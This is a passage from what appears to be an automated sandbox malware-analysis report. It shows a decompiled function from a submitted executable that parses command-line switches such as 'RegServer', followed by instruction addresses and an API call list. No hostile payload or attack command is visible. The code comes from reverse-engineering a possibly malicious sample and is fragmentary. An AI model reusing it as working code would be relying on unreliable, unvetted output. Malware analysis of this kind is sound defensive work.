                                                                                                                                                                                                                                              																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                              																_t218 = 0xa88b3e;
                                                                                                                                                                                                                                              																_t105 = _v276;
                                                                                                                                                                                                                                              																if(_t104 != 0x54) {
                                                                                                                                                                                                                                              																	_t218 = 0xa88a3a;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																E00A81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                              																_t202 = 0x104;
                                                                                                                                                                                                                                              																E00A8658A(_t218, 0x104, 0xa81140);
                                                                                                                                                                                                                                              																if(E00A831E0(_t218) != 0) {
                                                                                                                                                                                                                                              																	goto L50;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L106;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                              													if(_t111 == 0) {
                                                                                                                                                                                                                                              														if(_v266 != 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t199 = _v265;
                                                                                                                                                                                                                                              																if(_t199 != 0) {
                                                                                                                                                                                                                                              																	_t219 =  &_v265;
                                                                                                                                                                                                                                              																	do {
                                                                                                                                                                                                                                              																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                              																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                              																		if(_t115 == 0) {
                                                                                                                                                                                                                                              																			 *0xa88a2c = 1;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			_t200 = 2;
                                                                                                                                                                                                                                              																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                              																			if(_t119 == 0) {
                                                                                                                                                                                                                                              																				 *0xa88a30 = 1;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                              																					 *0xa88a34 = 1;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t209 = 0;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																		_t118 =  *_t219;
                                                                                                                                                                                                                                              																		_t199 = _t118;
                                                                                                                                                                                                                                              																	} while (_t118 != 0);
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															 *0xa88a2c = 1;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L50;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t127 = _t111 - 3;
                                                                                                                                                                                                                                              														if(_t127 == 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                              																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                              																		goto L76;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                              																			goto L83;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                              																				goto L76;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				goto L49;
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																L76:
                                                                                                                                                                                                                                              																_push(2);
                                                                                                                                                                                                                                              																_pop(1);
                                                                                                                                                                                                                                              																L83:
                                                                                                                                                                                                                                              																 *0xa88a38 = 1;
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              															goto L50;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t132 = _t127 - 1;
                                                                                                                                                                                                                                              															if(_t132 == 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0) {
                                                                                                                                                                                                                                              																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                              																			goto L49;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t201 = _v265;
                                                                                                                                                                                                                                              																		 *0xa89a2c = 1;
                                                                                                                                                                                                                                              																		if(_t201 != 0) {
                                                                                                                                                                                                                                              																			_t220 =  &_v265;
                                                                                                                                                                                                                                              																			do {
                                                                                                                                                                                                                                              																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                              																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                              																				if(_t142 == 0) {
                                                                                                                                                                                                                                              																					_t143 = 2;
                                                                                                                                                                                                                                              																					 *0xa89a2c =  *0xa89a2c | _t143;
                                                                                                                                                                                                                                              																					goto L70;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                              																					if(_t145 == 0) {
                                                                                                                                                                                                                                              																						 *0xa88d48 =  *0xa88d48 | 0x00000040;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                              																						if(_t146 == 0) {
                                                                                                                                                                                                                                              																							 *0xa89a2c =  *0xa89a2c & 0xfffffffd;
                                                                                                                                                                                                                                              																							goto L70;
                                                                                                                                                                                                                                              																						} else {
                                                                                                                                                                                                                                              																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                              																							if(_t147 == 0) {
                                                                                                                                                                                                                                              																								 *0xa89a2c =  *0xa89a2c & 0xfffffffe;
                                                                                                                                                                                                                                              																								goto L70;
                                                                                                                                                                                                                                              																							} else {
                                                                                                                                                                                                                                              																								_t149 = _t147;
                                                                                                                                                                                                                                              																								if(_t149 == 0) {
                                                                                                                                                                                                                                              																									 *0xa88d48 =  *0xa88d48 | 0x00000080;
                                                                                                                                                                                                                                              																								} else {
                                                                                                                                                                                                                                              																									if(_t149 == 3) {
                                                                                                                                                                                                                                              																										 *0xa89a2c =  *0xa89a2c | 0x00000004;
                                                                                                                                                                                                                                              																										L70:
                                                                                                                                                                                                                                              																										 *0xa88a28 = 1;
                                                                                                                                                                                                                                              																									} else {
                                                                                                                                                                                                                                              																										_t209 = 0;
                                                                                                                                                                                                                                              																									}
                                                                                                                                                                                                                                              																								}
                                                                                                                                                                                                                                              																							}
                                                                                                                                                                                                                                              																						}
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t144 =  *_t220;
                                                                                                                                                                                                                                              																				_t201 = _t144;
                                                                                                                                                                                                                                              																			} while (_t144 != 0);
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	 *0xa89a2c = 3;
                                                                                                                                                                                                                                              																	 *0xa88a28 = 1;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																goto L50;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																if(_t132 == 0) {
                                                                                                                                                                                                                                              																	goto L98;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	L49:
                                                                                                                                                                                                                                              																	_t209 = 0;
                                                                                                                                                                                                                                              																	L50:
                                                                                                                                                                                                                                              																	_t173 = _v272;
                                                                                                                                                                                                                                              																	if( *_t173 != 0) {
                                                                                                                                                                                                                                              																		goto L2;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		break;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L106;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										L34:
                                                                                                                                                                                                                                              										_t209 = 0;
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L131;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *0xa88a2c != 0 &&  *0xa88b3e == 0) {
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0xa89a3c, 0xa88b3e, 0x104) == 0) {
                                                                                                                                                                                                                                              							_t209 = 0;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t202 = 0x5c;
                                                                                                                                                                                                                                              							 *((char*)(E00A866C8(0xa88b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = _t209;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L131:
                                                                                                                                                                                                                                              			}


































































                                                                                                                                                                                                                                              0x00a85c9e
                                                                                                                                                                                                                                              0x00a85ca9
                                                                                                                                                                                                                                              0x00a85cb0
                                                                                                                                                                                                                                              0x00a85cb3
                                                                                                                                                                                                                                              0x00a85cb6
                                                                                                                                                                                                                                              0x00a85cb7
                                                                                                                                                                                                                                              0x00a85cb8
                                                                                                                                                                                                                                              0x00a85cbd
                                                                                                                                                                                                                                              0x00a86204
                                                                                                                                                                                                                                              0x00a85ccb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85ccb
                                                                                                                                                                                                                                              0x00a85cd3
                                                                                                                                                                                                                                              0x00a85cd7
                                                                                                                                                                                                                                              0x00a85cf4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85cf4
                                                                                                                                                                                                                                              0x00a85cf8
                                                                                                                                                                                                                                              0x00a85d00
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d06
                                                                                                                                                                                                                                              0x00a85d06
                                                                                                                                                                                                                                              0x00a85d0e
                                                                                                                                                                                                                                              0x00a85d10
                                                                                                                                                                                                                                              0x00a85d12
                                                                                                                                                                                                                                              0x00a85d14
                                                                                                                                                                                                                                              0x00a85d15
                                                                                                                                                                                                                                              0x00a85d17
                                                                                                                                                                                                                                              0x00a85d49
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d19
                                                                                                                                                                                                                                              0x00a85d19
                                                                                                                                                                                                                                              0x00a85d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d3f
                                                                                                                                                                                                                                              0x00a85d3f
                                                                                                                                                                                                                                              0x00a85d4b
                                                                                                                                                                                                                                              0x00a85d4b
                                                                                                                                                                                                                                              0x00a85d4f
                                                                                                                                                                                                                                              0x00a85d8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d93
                                                                                                                                                                                                                                              0x00a85d93
                                                                                                                                                                                                                                              0x00a85d9a
                                                                                                                                                                                                                                              0x00a85d9d
                                                                                                                                                                                                                                              0x00a85d9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d9e
                                                                                                                                                                                                                                              0x00a85d51
                                                                                                                                                                                                                                              0x00a85d5b
                                                                                                                                                                                                                                              0x00a85d72
                                                                                                                                                                                                                                              0x00a860fb
                                                                                                                                                                                                                                              0x00a860fb
                                                                                                                                                                                                                                              0x00a86207
                                                                                                                                                                                                                                              0x00a8620a
                                                                                                                                                                                                                                              0x00a8620b
                                                                                                                                                                                                                                              0x00a8620e
                                                                                                                                                                                                                                              0x00a86217
                                                                                                                                                                                                                                              0x00a85d78
                                                                                                                                                                                                                                              0x00a85d78
                                                                                                                                                                                                                                              0x00a85d80
                                                                                                                                                                                                                                              0x00a85d83
                                                                                                                                                                                                                                              0x00a85d84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d84
                                                                                                                                                                                                                                              0x00a85d5d
                                                                                                                                                                                                                                              0x00a85d5f
                                                                                                                                                                                                                                              0x00a85d62
                                                                                                                                                                                                                                              0x00a85d68
                                                                                                                                                                                                                                              0x00a85d64
                                                                                                                                                                                                                                              0x00a85d64
                                                                                                                                                                                                                                              0x00a85d64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d62
                                                                                                                                                                                                                                              0x00a85d5b
                                                                                                                                                                                                                                              0x00a85d4f
                                                                                                                                                                                                                                              0x00a85d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d9f
                                                                                                                                                                                                                                              0x00a85d9f
                                                                                                                                                                                                                                              0x00a85da5
                                                                                                                                                                                                                                              0x00a85dab
                                                                                                                                                                                                                                              0x00a85dba
                                                                                                                                                                                                                                              0x00a86218
                                                                                                                                                                                                                                              0x00a8621d
                                                                                                                                                                                                                                              0x00a86220
                                                                                                                                                                                                                                              0x00a86221
                                                                                                                                                                                                                                              0x00a86229
                                                                                                                                                                                                                                              0x00a86230
                                                                                                                                                                                                                                              0x00a86247
                                                                                                                                                                                                                                              0x00a8626a
                                                                                                                                                                                                                                              0x00a86272
                                                                                                                                                                                                                                              0x00a86249
                                                                                                                                                                                                                                              0x00a86255
                                                                                                                                                                                                                                              0x00a8625f
                                                                                                                                                                                                                                              0x00a86264
                                                                                                                                                                                                                                              0x00a86264
                                                                                                                                                                                                                                              0x00a86284
                                                                                                                                                                                                                                              0x00a85dc0
                                                                                                                                                                                                                                              0x00a85dc0
                                                                                                                                                                                                                                              0x00a85dca
                                                                                                                                                                                                                                              0x00a85e22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85dcc
                                                                                                                                                                                                                                              0x00a85dce
                                                                                                                                                                                                                                              0x00a85e24
                                                                                                                                                                                                                                              0x00a85e24
                                                                                                                                                                                                                                              0x00a85e2c
                                                                                                                                                                                                                                              0x00a85e47
                                                                                                                                                                                                                                              0x00a85e4a
                                                                                                                                                                                                                                              0x00a861d2
                                                                                                                                                                                                                                              0x00a861e2
                                                                                                                                                                                                                                              0x00a861e7
                                                                                                                                                                                                                                              0x00a861ee
                                                                                                                                                                                                                                              0x00a861f1
                                                                                                                                                                                                                                              0x00a861f1
                                                                                                                                                                                                                                              0x00a861f8
                                                                                                                                                                                                                                              0x00a861f8
                                                                                                                                                                                                                                              0x00a85e50
                                                                                                                                                                                                                                              0x00a85e53
                                                                                                                                                                                                                                              0x00a86109
                                                                                                                                                                                                                                              0x00a8611f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86125
                                                                                                                                                                                                                                              0x00a86137
                                                                                                                                                                                                                                              0x00a8613a
                                                                                                                                                                                                                                              0x00a8613c
                                                                                                                                                                                                                                              0x00a8613e
                                                                                                                                                                                                                                              0x00a8613e
                                                                                                                                                                                                                                              0x00a86141
                                                                                                                                                                                                                                              0x00a86141
                                                                                                                                                                                                                                              0x00a86143
                                                                                                                                                                                                                                              0x00a86144
                                                                                                                                                                                                                                              0x00a8614a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86150
                                                                                                                                                                                                                                              0x00a86152
                                                                                                                                                                                                                                              0x00a8615c
                                                                                                                                                                                                                                              0x00a86170
                                                                                                                                                                                                                                              0x00a86172
                                                                                                                                                                                                                                              0x00a8617c
                                                                                                                                                                                                                                              0x00a86190
                                                                                                                                                                                                                                              0x00a86190
                                                                                                                                                                                                                                              0x00a86196
                                                                                                                                                                                                                                              0x00a861a5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a861ab
                                                                                                                                                                                                                                              0x00a861b9
                                                                                                                                                                                                                                              0x00a861c6
                                                                                                                                                                                                                                              0x00a861c6
                                                                                                                                                                                                                                              0x00a8617e
                                                                                                                                                                                                                                              0x00a86180
                                                                                                                                                                                                                                              0x00a8618a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8618a
                                                                                                                                                                                                                                              0x00a8615e
                                                                                                                                                                                                                                              0x00a86160
                                                                                                                                                                                                                                              0x00a8616a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8616a
                                                                                                                                                                                                                                              0x00a8615c
                                                                                                                                                                                                                                              0x00a8614a
                                                                                                                                                                                                                                              0x00a8610b
                                                                                                                                                                                                                                              0x00a8610e
                                                                                                                                                                                                                                              0x00a8610e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e59
                                                                                                                                                                                                                                              0x00a85e59
                                                                                                                                                                                                                                              0x00a85e5c
                                                                                                                                                                                                                                              0x00a8604f
                                                                                                                                                                                                                                              0x00a86056
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8605c
                                                                                                                                                                                                                                              0x00a8606e
                                                                                                                                                                                                                                              0x00a86071
                                                                                                                                                                                                                                              0x00a86073
                                                                                                                                                                                                                                              0x00a86075
                                                                                                                                                                                                                                              0x00a86075
                                                                                                                                                                                                                                              0x00a86078
                                                                                                                                                                                                                                              0x00a86078
                                                                                                                                                                                                                                              0x00a8607a
                                                                                                                                                                                                                                              0x00a8607b
                                                                                                                                                                                                                                              0x00a86081
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86087
                                                                                                                                                                                                                                              0x00a86087
                                                                                                                                                                                                                                              0x00a8608d
                                                                                                                                                                                                                                              0x00a8609c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a860a2
                                                                                                                                                                                                                                              0x00a860aa
                                                                                                                                                                                                                                              0x00a860b2
                                                                                                                                                                                                                                              0x00a860b7
                                                                                                                                                                                                                                              0x00a860bd
                                                                                                                                                                                                                                              0x00a860bf
                                                                                                                                                                                                                                              0x00a860bf
                                                                                                                                                                                                                                              0x00a860d6
                                                                                                                                                                                                                                              0x00a860e0
                                                                                                                                                                                                                                              0x00a860e7
                                                                                                                                                                                                                                              0x00a860f5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a860f5
                                                                                                                                                                                                                                              0x00a8609c
                                                                                                                                                                                                                                              0x00a86081
                                                                                                                                                                                                                                              0x00a85e62
                                                                                                                                                                                                                                              0x00a85e62
                                                                                                                                                                                                                                              0x00a85e65
                                                                                                                                                                                                                                              0x00a85fd3
                                                                                                                                                                                                                                              0x00a85fe9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85fef
                                                                                                                                                                                                                                              0x00a85fef
                                                                                                                                                                                                                                              0x00a85ff7
                                                                                                                                                                                                                                              0x00a85ffd
                                                                                                                                                                                                                                              0x00a86003
                                                                                                                                                                                                                                              0x00a86006
                                                                                                                                                                                                                                              0x00a86011
                                                                                                                                                                                                                                              0x00a86014
                                                                                                                                                                                                                                              0x00a8603d
                                                                                                                                                                                                                                              0x00a86016
                                                                                                                                                                                                                                              0x00a86018
                                                                                                                                                                                                                                              0x00a86019
                                                                                                                                                                                                                                              0x00a8601b
                                                                                                                                                                                                                                              0x00a86033
                                                                                                                                                                                                                                              0x00a8601d
                                                                                                                                                                                                                                              0x00a86020
                                                                                                                                                                                                                                              0x00a86029
                                                                                                                                                                                                                                              0x00a86022
                                                                                                                                                                                                                                              0x00a86022
                                                                                                                                                                                                                                              0x00a86022
                                                                                                                                                                                                                                              0x00a86020
                                                                                                                                                                                                                                              0x00a8601b
                                                                                                                                                                                                                                              0x00a86042
                                                                                                                                                                                                                                              0x00a86044
                                                                                                                                                                                                                                              0x00a86046
                                                                                                                                                                                                                                              0x00a8604a
                                                                                                                                                                                                                                              0x00a85ff7
                                                                                                                                                                                                                                              0x00a85fd5
                                                                                                                                                                                                                                              0x00a85fd8
                                                                                                                                                                                                                                              0x00a85fd8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e6b
                                                                                                                                                                                                                                              0x00a85e6b
                                                                                                                                                                                                                                              0x00a85e6e
                                                                                                                                                                                                                                              0x00a85f8b
                                                                                                                                                                                                                                              0x00a85f99
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85f9f
                                                                                                                                                                                                                                              0x00a85fa7
                                                                                                                                                                                                                                              0x00a85faf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85fb1
                                                                                                                                                                                                                                              0x00a85fb3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85fb5
                                                                                                                                                                                                                                              0x00a85fb7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85fb9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85fb9
                                                                                                                                                                                                                                              0x00a85fb7
                                                                                                                                                                                                                                              0x00a85fb3
                                                                                                                                                                                                                                              0x00a85faf
                                                                                                                                                                                                                                              0x00a85f8d
                                                                                                                                                                                                                                              0x00a85f8d
                                                                                                                                                                                                                                              0x00a85f8d
                                                                                                                                                                                                                                              0x00a85f8f
                                                                                                                                                                                                                                              0x00a85fc1
                                                                                                                                                                                                                                              0x00a85fc1
                                                                                                                                                                                                                                              0x00a85fc1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e74
                                                                                                                                                                                                                                              0x00a85e74
                                                                                                                                                                                                                                              0x00a85e77
                                                                                                                                                                                                                                              0x00a85ea0
                                                                                                                                                                                                                                              0x00a85ebd
                                                                                                                                                                                                                                              0x00a85f79
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85f7f
                                                                                                                                                                                                                                              0x00a85ec3
                                                                                                                                                                                                                                              0x00a85ec3
                                                                                                                                                                                                                                              0x00a85ecc
                                                                                                                                                                                                                                              0x00a85ed4
                                                                                                                                                                                                                                              0x00a85ed6
                                                                                                                                                                                                                                              0x00a85edc
                                                                                                                                                                                                                                              0x00a85edf
                                                                                                                                                                                                                                              0x00a85eea
                                                                                                                                                                                                                                              0x00a85eed
                                                                                                                                                                                                                                              0x00a85f3f
                                                                                                                                                                                                                                              0x00a85f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85eef
                                                                                                                                                                                                                                              0x00a85eef
                                                                                                                                                                                                                                              0x00a85ef2
                                                                                                                                                                                                                                              0x00a85f34
                                                                                                                                                                                                                                              0x00a85ef4
                                                                                                                                                                                                                                              0x00a85ef4
                                                                                                                                                                                                                                              0x00a85ef7
                                                                                                                                                                                                                                              0x00a85f2b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85ef9
                                                                                                                                                                                                                                              0x00a85ef9
                                                                                                                                                                                                                                              0x00a85efc
                                                                                                                                                                                                                                              0x00a85f22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85efe
                                                                                                                                                                                                                                              0x00a85eff
                                                                                                                                                                                                                                              0x00a85f02
                                                                                                                                                                                                                                              0x00a85f16
                                                                                                                                                                                                                                              0x00a85f04
                                                                                                                                                                                                                                              0x00a85f07
                                                                                                                                                                                                                                              0x00a85f0d
                                                                                                                                                                                                                                              0x00a85f46
                                                                                                                                                                                                                                              0x00a85f46
                                                                                                                                                                                                                                              0x00a85f09
                                                                                                                                                                                                                                              0x00a85f09
                                                                                                                                                                                                                                              0x00a85f09
                                                                                                                                                                                                                                              0x00a85f07
                                                                                                                                                                                                                                              0x00a85f02
                                                                                                                                                                                                                                              0x00a85efc
                                                                                                                                                                                                                                              0x00a85ef7
                                                                                                                                                                                                                                              0x00a85ef2
                                                                                                                                                                                                                                              0x00a85f4c
                                                                                                                                                                                                                                              0x00a85f4e
                                                                                                                                                                                                                                              0x00a85f50
                                                                                                                                                                                                                                              0x00a85f54
                                                                                                                                                                                                                                              0x00a85ed4
                                                                                                                                                                                                                                              0x00a85ea2
                                                                                                                                                                                                                                              0x00a85ea4
                                                                                                                                                                                                                                              0x00a85eaf
                                                                                                                                                                                                                                              0x00a85eaf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e79
                                                                                                                                                                                                                                              0x00a85e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e83
                                                                                                                                                                                                                                              0x00a85e83
                                                                                                                                                                                                                                              0x00a85e83
                                                                                                                                                                                                                                              0x00a85e85
                                                                                                                                                                                                                                              0x00a85e85
                                                                                                                                                                                                                                              0x00a85e8e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e94
                                                                                                                                                                                                                                              0x00a85e8e
                                                                                                                                                                                                                                              0x00a85e7d
                                                                                                                                                                                                                                              0x00a85e77
                                                                                                                                                                                                                                              0x00a85e6e
                                                                                                                                                                                                                                              0x00a85e65
                                                                                                                                                                                                                                              0x00a85e5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00a85dce
                                                                                                                                                                                                                                              0x00a85dca
                                                                                                                                                                                                                                              0x00a85dba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d00
                                                                                                                                                                                                                                              0x00a85dd9
                                                                                                                                                                                                                                              0x00a85e04
                                                                                                                                                                                                                                              0x00a861fe
                                                                                                                                                                                                                                              0x00a85e0a
                                                                                                                                                                                                                                              0x00a85e0c
                                                                                                                                                                                                                                              0x00a85e17
                                                                                                                                                                                                                                              0x00a85e17
                                                                                                                                                                                                                                              0x00a85e04
                                                                                                                                                                                                                                              0x00a86200
                                                                                                                                                                                                                                              0x00a86200
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharNextA.USER32(?,00000000,?,?), ref: 00A85CEE
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00A88B3E,00000104,00000000,?,?), ref: 00A85DFC
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00A85E3E
                                                                                                                                                                                                                                              • CharUpperA.USER32(-00000052), ref: 00A85EE1
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A85F6F
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00A85FA7
                                                                                                                                                                                                                                              • CharUpperA.USER32(-0000004E), ref: 00A86008
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00A860AA
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00A81140,00000000,00000040,00000000), ref: 00A861F1
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00A861F8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                              • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                              • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                              • Opcode ID: 6030109e53eb9946d8c79a6ccae10c28b520cfdba72e22bb01766027a7f823fd
                                                                                                                                                                                                                                              • Instruction ID: e7cac3e123b89215b0b0ef969c18122d274cec573b78b7297b8d6be9f026cd7a
